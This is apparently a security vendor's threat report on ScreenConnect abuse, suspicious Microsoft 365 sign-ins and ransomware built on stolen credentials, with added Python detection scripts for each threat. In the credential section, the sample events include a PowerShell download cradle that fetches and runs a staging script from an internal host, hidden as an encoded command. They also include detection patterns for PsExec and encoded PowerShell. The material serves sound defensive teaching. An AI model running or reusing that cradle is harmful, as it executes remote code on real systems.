Email Threat Radar – December 2025
Notable threats targeting organisations seen by Barracuda Managed XDR
Posted: Friday, Dec 05

Takeaways

  • A rise in attackers trying to use ScreenConnect for unauthorised remote access
  • Attackers using bought or stolen credentials for ransomware and data theft
  • A rise in Microsoft 365 login attempts from unfamiliar countries

Attackers using ScreenConnect for unauthorised remote access

What’s happening?

The SOC team recently noticed a rise in the suspicious use of ScreenConnect. This includes attackers attempting to connect endpoints to targets’ ScreenConnect deployments, and attackers deploying ScreenConnect themselves to control hosts remotely.

ScreenConnect is a trusted and popular remote device management tool used by many organisations and their managed service providers (MSPs). As a result, simply seeing ScreenConnect running on a host does not immediately arouse suspicion.

Earlier in 2025, a serious vulnerability came to light in older versions of ScreenConnect that could allow attackers to break into systems and run malicious code without authorisation. Attackers are exploiting it to take control of systems remotely, install ransomware, steal data, and move laterally through the network to other connected systems.

The successful breach of an existing deployment can give criminals access to many devices and even many organisations at once, for example every customer served by a compromised MSP's instance.

ConnectWise released a patch for the vulnerability on April 24, 2025.

Your organisation may be at risk if you are:

  • Running older versions of ScreenConnect that have not been updated to the patched release.
  • Using unmanaged or unauthorised remote access tools.
  • Not enforcing multifactor authentication (MFA) for administrator accounts.

To protect your organisation:

  • Implement a strong, multi-layered security solution such as Barracuda XDR Managed Endpoint Security that can spot and contain suspicious ScreenConnect activity.
  • Ensure your ScreenConnect software is running the latest version (25.2.4 or newer).
  • Review your logs for ScreenConnect sessions, client installs and relay connections that nobody in your organisation or your MSP initiated.
  • Enable MFA for all accounts, especially administrator accounts.
  • Block unknown remote access tools and closely monitor attempts to look up or connect to ScreenConnect web addresses.
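
The hunting steps above can be expressed as a small check over endpoint telemetry. The following is an added example, not Barracuda's code or part of the original report: it flags ScreenConnect clients that point at a relay host other than the organisation's own instance, DNS lookups for other ScreenConnect relay hosts, and a ScreenConnect server still running a release older than 25.2.4. The telemetry records, the approved relay host name and the record layout (an assumed EDR schema) are all constructed for the example; the h= parameter carrying the relay host is assumed from how the ScreenConnect client is normally launched.

```python
"""Hunt for suspicious ScreenConnect activity in endpoint telemetry.

Added example, not Barracuda's code. Flags: clients pointed at an unapproved
relay host, DNS lookups for unapproved relay hosts, and unpatched servers.
Records and the approved relay are constructed; the schema is assumed.
"""
import re

# Assumption: the organisation's own ScreenConnect instance relays through this host.
# Any other *.screenconnect.com relay seen on our endpoints is an unmanaged or attacker deployment.
APPROVED_RELAYS = {"acme-relay.screenconnect.com"}
FIXED_VERSION = (25, 2, 4)  # first release carrying the April 2025 fix

# The client runs as ScreenConnect.ClientService.exe; its command line carries the relay
# host in an h= parameter (assumed from the client's usual launch string).
SC_CLIENT = re.compile(r"screenconnect\.clientservice\.exe", re.I)
RELAY_PARAM = re.compile(r"[?&]h=([^&\s\"]+)")


def parse_version(text):
    """'25.2.3.9120' -> (25, 2, 3, 9120); tuples compare element-wise."""
    return tuple(int(p) for p in text.split("."))


def is_unpatched(version):
    return parse_version(version) < FIXED_VERSION


def relay_host(cmdline):
    """Relay host named in a ScreenConnect client command line, or None."""
    m = RELAY_PARAM.search(cmdline)
    return m.group(1).lower() if m else None


def hunt(events, approved=APPROVED_RELAYS):
    """Return (finding, host, detail) tuples for every suspicious record."""
    findings = []
    for e in events:
        if e["type"] == "process" and SC_CLIENT.search(e["image"]):
            host = relay_host(e["cmdline"])
            if host and host not in approved:
                findings.append(("unapproved_relay", e["host"], host))
        elif e["type"] == "dns":
            q = e["query"].lower()
            if q.endswith(".screenconnect.com") and q not in approved:
                findings.append(("unapproved_relay_lookup", e["host"], q))
        elif e["type"] == "server" and is_unpatched(e["version"]):
            findings.append(("unpatched_server", e["host"], e["version"]))
    return findings


EVENTS = [  # constructed sample telemetry
    {"type": "process", "host": "WS-017",
     "image": r"C:\Program Files (x86)\ScreenConnect Client (7f3a9c)\ScreenConnect.ClientService.exe",
     "cmdline": '"ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=acme-relay.screenconnect.com&p=443&k=BgIAAA"'},
    {"type": "process", "host": "WS-042",
     "image": r"C:\Users\Public\ScreenConnect.ClientService.exe",
     "cmdline": '"ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-9f2c-relay.screenconnect.com&p=443&k=BgIAAA"'},
    {"type": "dns", "host": "SRV-01", "query": "instance-9f2c-relay.screenconnect.com"},
    {"type": "dns", "host": "WS-017", "query": "acme-relay.screenconnect.com"},
    {"type": "server", "host": "SC-SERVER", "version": "25.2.3.9120"},
    {"type": "server", "host": "SC-SERVER-2", "version": "25.2.4.9020"},
]

if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(*finding)
```

Run against real telemetry, the same three checks cover the report's two cases: an attacker's own ScreenConnect client shows up as an unapproved relay, while an attacker connecting to your existing deployment shows up as a server that has not yet reached 25.2.4.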


A rise in Microsoft 365 login attempts from unfamiliar countries

What’s happening?

Barracuda’s SOC team has detected a significant rise in attempts to log into Microsoft 365 accounts from countries where the targets don’t operate – a clear red flag that attackers are trying to access accounts using stolen usernames and passwords.

If the attackers succeed in breaching an account, they can access emails and files and impersonate the legitimate account holder to launch convincing internal phishing attacks and move deeper into the network.

Your organisation may be at risk if you are:

  • Not implementing geo-blocking or location-based login rules.
  • Allowing employees to use weak or reused passwords.
  • Not enforcing MFA consistently across the organisation.
  • Not monitoring sign-ins for unusual locations, times or patterns.

To protect your organisation:

  • Enforce the use of complex, unique passwords, and consider password managers.
  • Enable MFA everywhere – this is the single, most effective step you can take.
  • Monitor sign-in alerts and review sign-in logs for unfamiliar countries and for one address failing against many accounts.
  • Implement conditional access policies that block sign-ins from countries or regions where your organisation does not operate.
  • Train employees to spot phishing attempts and report them.
  • Implement a strong, multi-layered security solution that can spot and block incidents at different stages of the attack chain.
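
The detective side of the controls above, as an added example rather than code from Barracuda or the original report: a review of exported Microsoft 365 (Entra ID) sign-in records that surfaces successful sign-ins from countries the business does not operate in, source addresses spraying passwords across many accounts, and accounts that then succeeded from one of those addresses. The field names follow the Entra ID sign-in log (userPrincipalName, ipAddress, location.countryOrRegion, status.errorCode, where 0 is success and 50126 is an invalid username or password); the records and the set of business countries are constructed.

```python
"""Review Entra ID sign-in records for unfamiliar countries and password spraying.

Added example, not Barracuda's code. Field names follow the Entra ID sign-in
log; the records and BUSINESS_COUNTRIES are constructed for the example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

BUSINESS_COUNTRIES = {"GB", "IE"}   # assumption: where this organisation's staff actually work
SUCCESS, BAD_PASSWORD = 0, 50126    # Entra status.errorCode values


def ts(text):
    return datetime.fromisoformat(text.replace("Z", "+00:00"))


def unfamiliar_country_signins(signins, allowed=BUSINESS_COUNTRIES):
    """Successful sign-ins from outside the business footprint: the report's red flag."""
    return [(s["userPrincipalName"], s["location"]["countryOrRegion"], s["ipAddress"])
            for s in signins
            if s["status"]["errorCode"] == SUCCESS
            and s["location"]["countryOrRegion"] not in allowed]


def password_spray_sources(signins, min_users=3, window=timedelta(minutes=30)):
    """IPs whose bad-password failures hit several distinct accounts within one window."""
    failures = defaultdict(list)
    for s in signins:
        if s["status"]["errorCode"] == BAD_PASSWORD:
            failures[s["ipAddress"]].append((ts(s["createdDateTime"]), s["userPrincipalName"]))
    sources = {}
    for ip, items in failures.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            users = {u for t, u in items[i:] if t - t0 <= window}
            if len(users) >= min_users:
                sources[ip] = sorted(users)
                break
    return sources


def spray_then_success(signins, sprays):
    """Accounts that signed in successfully from a spraying IP: the likely compromised ones."""
    return sorted({(s["userPrincipalName"], s["ipAddress"]) for s in signins
                   if s["ipAddress"] in sprays and s["status"]["errorCode"] == SUCCESS})


def signin(time, upn, ip, country, code):
    return {"createdDateTime": time, "userPrincipalName": upn, "ipAddress": ip,
            "location": {"countryOrRegion": country}, "status": {"errorCode": code}}


SIGNINS = [  # constructed records; 192.0.2.x, 198.51.100.x, 203.0.113.x are documentation ranges
    signin("2025-11-27T08:02:11Z", "a.khan@example.com", "192.0.2.10", "GB", SUCCESS),
    signin("2025-11-27T08:05:43Z", "a.khan@example.com", "203.0.113.77", "NG", SUCCESS),
    signin("2025-11-27T08:10:02Z", "b.lee@example.com", "198.51.100.9", "BR", BAD_PASSWORD),
    signin("2025-11-27T08:10:09Z", "c.diaz@example.com", "198.51.100.9", "BR", BAD_PASSWORD),
    signin("2025-11-27T08:10:15Z", "d.oyelaran@example.com", "198.51.100.9", "BR", BAD_PASSWORD),
    signin("2025-11-27T08:13:50Z", "b.lee@example.com", "198.51.100.9", "BR", SUCCESS),
    signin("2025-11-27T09:00:00Z", "e.ross@example.com", "192.0.2.20", "IE", SUCCESS),
]


def review(signins=SIGNINS):
    """Run all three checks and return the findings keyed by check name."""
    sprays = password_spray_sources(signins)
    return {"unfamiliar": unfamiliar_country_signins(signins),
            "sprays": sprays,
            "compromised": spray_then_success(signins, sprays)}


if __name__ == "__main__":
    for name, result in review().items():
        print(name, result)
```

A conditional access policy keyed on named locations is the preventive counterpart: it would have refused the NG and BR sign-ins before they succeeded, and the spray would then appear in the logs as blocked rather than as bad-password failures.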

Attackers using bought or stolen credentials for ransomware and data theft

What’s happening?

Cybercriminals are stealing or buying usernames and passwords (credentials) and using them to break into systems. Once inside, they launch ransomware attacks or steal sensitive data.

These attacks often look like normal activity because the hackers use genuine credentials. Barracuda Managed XDR’s SOC tools spot the clues left by attackers, such as the unusual use of legitimate administrative tools (PsExec, PowerShell), multiple repeated or simultaneous login attempts, or the unexpected creation of remote services.

Your organisation may be at risk if you are:

  • Allowing employees to use weak or reused passwords.
  • Not enforcing MFA consistently across the organisation.
  • Not monitoring for unusual logins or the use of admin tools.
  • Lacking alerts for suspicious remote access or script execution.

To protect your organisation:

  • Enforce the use of complex, unique passwords.
  • Reset credentials promptly whenever compromise is suspected and screen new passwords against known-breached lists. If your policy also rotates credentials on a fixed schedule, for example every three months, bear in mind that current NIST guidance (SP 800-63B) no longer recommends forced periodic rotation on its own, because it tends to produce predictable variations of the old password.
  • Enable MFA everywhere, and especially for admin and remote access accounts.
  • Monitor activity, looking for odd login times, the unexpected use of admin tools, or new remote services.
  • Train employees to spot phishing attempts and report them.
  • Implement a strong, multi-layered security solution that can spot and block incidents at different stages of the attack chain.
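
The clues described above can be checked for directly in Windows event records. This is an added example and not Barracuda's code or part of the report: it looks for PsExec-style remote service creation (System log Event 7045), encoded PowerShell command lines (Security Event 4688) and one account authenticating over the network from several source addresses within a short window (Security Event 4624). The dict keys mirror the named fields of those events; the surrounding record layout, the host names and the events themselves are constructed for the example. Event 4688 only carries a command line when the "Include command line in process creation events" policy is enabled.

```python
"""Spot credential-abuse tradecraft in Windows Security/System event records.

Added example, not Barracuda's code. Checks Event 7045 (service installed),
Event 4688 (process created, with command line) and Event 4624 (logon).
The events and record layout are constructed for the example.
"""
import base64
from collections import defaultdict
from datetime import datetime, timedelta


def encode_ps(command):
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE command text."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps(blob):
    return base64.b64decode(blob).decode("utf-16-le")


def ts(text):
    return datetime.fromisoformat(text)


# PsExec installs its helper service as PSEXESVC; PAExec is a common clone. A service whose
# binary sits in a temp directory or was pushed over ADMIN$ deserves a look whatever its name.
KNOWN_REMOTE_SVC = {"psexesvc", "paexec"}


def remote_service_findings(events):
    out = []
    for e in events:
        if e["EventID"] != 7045:
            continue
        name, path = e["ServiceName"].lower(), e["ImagePath"].lower()
        if any(n in name for n in KNOWN_REMOTE_SVC) or "\\admin$\\" in path or "\\temp\\" in path:
            out.append(("remote_service", e["Computer"], e["ServiceName"]))
    return out


def encoded_powershell_findings(events):
    out = []
    for e in events:
        if e["EventID"] != 4688 or "powershell" not in e["NewProcessName"].lower():
            continue
        tokens = e["CommandLine"].split()
        for i, tok in enumerate(tokens[:-1]):
            # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
            if len(tok) >= 2 and "-encodedcommand".startswith(tok.lower()):
                try:
                    decoded = decode_ps(tokens[i + 1])
                except Exception:
                    decoded = "<undecodable>"
                out.append(("encoded_powershell", e["Computer"], decoded))
    return out


def multi_source_logons(events, window=timedelta(minutes=10), min_sources=2):
    """Same account logging on over the network from >= min_sources addresses within the window."""
    by_user = defaultdict(list)
    for e in events:
        if e["EventID"] == 4624 and e["LogonType"] in (3, 10) \
                and e["IpAddress"] not in ("-", "::1", "127.0.0.1"):
            by_user[e["TargetUserName"]].append((ts(e["Time"]), e["IpAddress"]))
    out = []
    for user, logons in sorted(by_user.items()):
        logons.sort()
        for i, (t0, _) in enumerate(logons):
            ips = {ip for t, ip in logons[i:] if t - t0 <= window}
            if len(ips) >= min_sources:
                out.append(("multi_source_logon", user, tuple(sorted(ips))))
                break
    return out


def hunt(events):
    return remote_service_findings(events) + encoded_powershell_findings(events) + multi_source_logons(events)


STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://10.20.1.15/stage.ps1')"

EVENTS = [  # constructed sample events
    {"EventID": 4624, "Time": "2025-11-28T02:14:05", "Computer": "FS-01", "TargetUserName": "svc_backup", "LogonType": 3, "IpAddress": "10.20.1.15"},
    {"EventID": 4624, "Time": "2025-11-28T02:15:40", "Computer": "FS-01", "TargetUserName": "svc_backup", "LogonType": 3, "IpAddress": "10.20.1.16"},
    {"EventID": 4624, "Time": "2025-11-28T02:16:02", "Computer": "FS-01", "TargetUserName": "svc_backup", "LogonType": 3, "IpAddress": "10.20.1.17"},
    {"EventID": 7045, "Time": "2025-11-28T02:16:30", "Computer": "FS-01", "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"EventID": 4688, "Time": "2025-11-28T02:17:01", "Computer": "FS-01",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(STAGER)},
    {"EventID": 4624, "Time": "2025-11-28T09:01:00", "Computer": "WS-003", "TargetUserName": "j.doe", "LogonType": 2, "IpAddress": "-"},
]

if __name__ == "__main__":
    for finding in hunt(EVENTS):
        print(*finding)
```

Decoding the -EncodedCommand argument matters: the raw event only shows base64, while the decoded text shows the download cradle and the staging host, which is what the responder needs to scope the incident.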

How Barracuda Managed XDR can help your organisation

Barracuda Managed XDR delivers advanced protection against the threats identified in this report by combining cutting-edge technology with expert SOC oversight. With real-time threat intelligence, automated responses, a 24/7/365 SOC team and XDR Managed Vulnerability Security that identifies security gaps and oversights, Barracuda Managed XDR ensures comprehensive, proactive protection across your network, cloud, email, servers and endpoints, giving you the confidence to stay ahead of evolving threats.
